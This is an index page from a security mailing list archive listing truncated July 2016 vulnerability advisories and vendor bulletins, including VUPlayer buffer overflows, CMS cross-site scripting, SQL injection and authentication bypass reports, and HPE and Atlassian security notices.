|
|
Colapse all |
Post message
VUPlayer 2.49 - (.wax) Buffer Overflow Vulnerability 2016-07-27 Vulnerability Lab (research vulnerability-lab com) VUPlayer 2.49 - (.pls) Buffer Overflow Vulnerability 2016-07-27 Vulnerability Lab (research vulnerability-lab com) Document Title: =============== VUPlayer 2.49 - (.pls) Buffer Overflow Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1876 Release Date: ============= 2016-07-25 Vulnerability Laboratory ID (VL-ID): ================================= [ more ] [ reply ] DornCMS v1.4 - (FileManager) Persistent Cross Site Scripting Vulnerability 2016-07-27 Vulnerability Lab (research vulnerability-lab com) Document Title: =============== DornCMS v1.4 - (FileManager) Persistent Cross Site Scripting Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1885 Release Date: ============= 2016-07-26 Vulnerability Laboratory ID (VL-ID): ============ [ more ] [ reply ] Nusiorung CMS 2016 - (Login) Auth Bypass Vulnerability 2016-07-27 Vulnerability Lab (research vulnerability-lab com) Document Title: =============== Nusiorung CMS 2016 - (Login) Auth Bypass Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1875 Release Date: ============= 2016-07-13 Vulnerability Laboratory ID (VL-ID): ================================ [ more ] [ reply ] [security bulletin] HPSBST03603 rev.1 - HPE StoreVirtual Products running LeftHand OS using glibc, Remote Arbitrary Code Execution, Denial of Service (DoS) 2016-07-26 security-alert hpe com -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId= emr_n a-c05212266 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c05212266 Version: 1 HPSBST03603 r [ more ] [ reply ] Silurus Classifieds XSS Vulnerability 2016-07-26 ak47464659484 gmail com Title: Silurus Classifieds XSS Vulnerability Software : Silurus Classifieds Software Version : v2.0 Vendor: http://snowhall.com/slides/silurus Vulnerability Published : 2016-07-25 Author:zhiwei_jiang Email:ak47464659484 (at) gmail (dot) com [email concealed] Impact : Medium(CVSS2 Base : 4.3, AV:N/AC:M/Au:N/C:N/I:P/A [ more ] [ reply ] Cross-Site Scripting vulnerability in ColorWay WordPress Theme 2016-07-26 Summer of Pwnage (lists securify nl) ------------------------------------------------------------------------ Cross-Site Scripting vulnerability in ColorWay WordPress Theme ------------------------------------------------------------------------ Yorick Koster, July 2016 ----------------------------------------------------------------- [ more ] [ reply ] Dropbox 6.4.14 DLL Hijacking Vulnerability 2016-07-26 mehta himanshu21 gmail com Aloha, Summary Dropbox Installer for Windows contains a DLL hijacking vulnerability that could allow an unauthenticated, remote attacker to execute arbitrary code on the targeted system. The vulnerability exists due to some DLL file is loaded by 'DropboxInstaller.exe' improperly. And it allows an a [ more ] [ reply ] Huawei ISM Professional XSS Vulnerability 2016-07-26 ak47464659484 gmail com Title: Huawei ISM Professional XSS Vulnerability Software : ISM Professional OceanStor Software Version : Copyright©Huawei Technologies Co., Ltd. 2009-2010. All rights reserved. Vendor: www.huawei.com Vulnerability Published : 2016-07-25 Author:zhiwei_jiang Email:ak47464659484@gmail [ more ] [ reply ] Crashing Browsers Remotely via Insecure Search Suggestions 2016-07-26 research nightwatchcybersecurity com [Original here: https://wwws.nightwatchcybersecurity.com/2016/07/26/research-crashing-br owsers-remotely-via-insecure-search-suggestions/] Summary Intercepting insecure search suggestion requests from browsers, and returning very large responses leads to browser crashes (but not RCE). Affected brow [ more ] [ reply ] MySQL 0days followup (CVE-2016-3477) CVSS 8.1 2016-07-26 lem nikolas gmail com Among other issues reported, the most critical flaw in the July CPU 2016, rated CVSS v3.0 base score 8.1, is the Server Parser subcomponent issue(CVE-2016-3477) and one of our findings. Versions 5.5.49 and earlier, 5.6.30 and earlier, and 5.7.12 and earlier are affected. The zero-day permits unauth [ more ] [ reply ] July 2016 - Bamboo Server - Critical Security Advisory 2016-07-26 David Black (dblack atlassian com) -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Note: the current version of this advisory can be found at https://confluence.atlassian.com/x/rSGSMQ . CVE ID: * CVE-2016-5229 - Deserialisation in Bamboo. Product: Bamboo Affected Bamboo product versions: 2.3.1 <= version < 5.11.4.1 5.12.0 <= vers [ more ] [ reply ] [security bulletin] HPSBGN03630 rev.1 - HP Operations Manager for Unix, Solaris, and Linux using Apache Commons Collections (ACC), Remote Code Execution 2016-07-25 security-alert hpe com -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId= emr_n a-c05206507 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c05206507 Version: 1 HPSBGN03630 r [ more ] [ reply ] Secunia Research: Reprise License Manager "akey" Buffer Overflow Vulnerability 2016-07-25 Secunia Research (remove-vuln secunia com) Secunia Research: Reprise License Manager "actserver" Buffer Overflow Vulnerability 2016-07-25 Secunia Research (remove-vuln secunia com) FreeBSD Security Advisory FreeBSD-SA-16:25.bspatch 2016-07-25 FreeBSD Security Advisories (security-advisories freebsd org) XSS and SQLi in huge IT gallery v1.1.5 for Joomla 2016-07-25 Larry W. Cashdollar (larry0 me com) Title: XSS and SQLi in huge IT gallery v1.1.5 for Joomla Fixed: v1.1.7 Author: Larry W. Cashdollar, @_larry0 and Elitza Neytcheva, @ElitzaNeytcheva Date: 2016-07-14 Download Site: http://extensions.joomla.org/extensions/extension/photos-a-images/galler ies/gallery-pro Vendor: huge-it.com Vendor Notif [ more ] [ reply ] SEC Consult SA-20160725-0 :: Multiple vulnerabilities in Micro Focus (Novell) Filr 2016-07-25 SEC Consult Vulnerability Lab (research sec-consult com) Cross-Site Scripting in Code Snippets WordPress Plugin 2016-07-24 Summer of Pwnage (lists securify nl) ------------------------------------------------------------------------ Cross-Site Scripting in Code Snippets WordPress Plugin ------------------------------------------------------------------------ Burak Kelebek, July 2016 ------------------------------------------------------------------------ [ more ] [ reply ] Neoscreen v4.5 Cross-site scripting 2016-07-24 alex_haynes outlook com Exploit Title: Neoscreen Cross-site scripting Product: Neoscreen by Cube Digital Media Vulnerable Versions: 4.5 and all previous versions Tested Version: 4.5 Advisory Publication: July 24, 2016 Vulnerability Type: Cross-Site Scripting [CWE-79] CVE Reference: NONE Credit: Alex Haynes Advisory Detail [ more ] [ reply ] Neoscreen v4.5 Blind SQL injection 2016-07-24 alex_haynes outlook com Exploit Title: Neoscreen Blind SQL injection Product: Neoscreen by Cube Digital Media Vulnerable Versions: 4.5 and all previous versions Tested Version: 4.5 Advisory Publication: July 24, 2016 Vulnerability Type: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') [C [ more ] [ reply ] Neoscreen v4.5 Authentication bypass 2016-07-24 alex_haynes outlook com Exploit Title: Neoscreen v4.5 Authentication bypass Product: Neoscreen by Cube Digital Media Vulnerable Versions: 4.5 and all previous versions Tested Version: 4.5 Advisory Publication: July 24, 2016 Vulnerability Type: Authentication Bypass Issues [CWE-592] CVE Reference: NONE Credit: Alex Haynes [ more ] [ reply ] Autobahn|Python Insecure allowedOrigins validation >= 0.14.1 2016-07-23 mgill c0ffee me Observation: Autobahn|Python incorrectly checks the Origin header when the 'allowedOrigins' value is set. This can allow third parties to execute legitimate requests for WAMP WebSocket requests against an Autobahn|Python/Crossbar.io server within another browser's context. Proof of Concept: The fol [ more ] [ reply ] Defense in depth -- the Microsoft way (part 41): vulnerable by (poor implementation of bad) design 2016-07-23 Stefan Kanthak (stefan kanthak nexgo de) Hi @ll, Windows 7 introduced the "Deployment Image Servicing and Management" tool DISM.exe; this command line program is called for example by its predecessor PkgMgr.exe (a GUI program which requests elevated privileges), or by Windows Update (which runs under SYSTEM account). DISM.exe needs to be [ more ] [ reply ] |
|
Privacy Statement |
===============
VUPlayer 2.49 - (.wax) Buffer Overflow Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1877
Release Date:
=============
2016-07-26
Vulnerability Laboratory ID (VL-ID):
==================================
[ more ] [ reply ]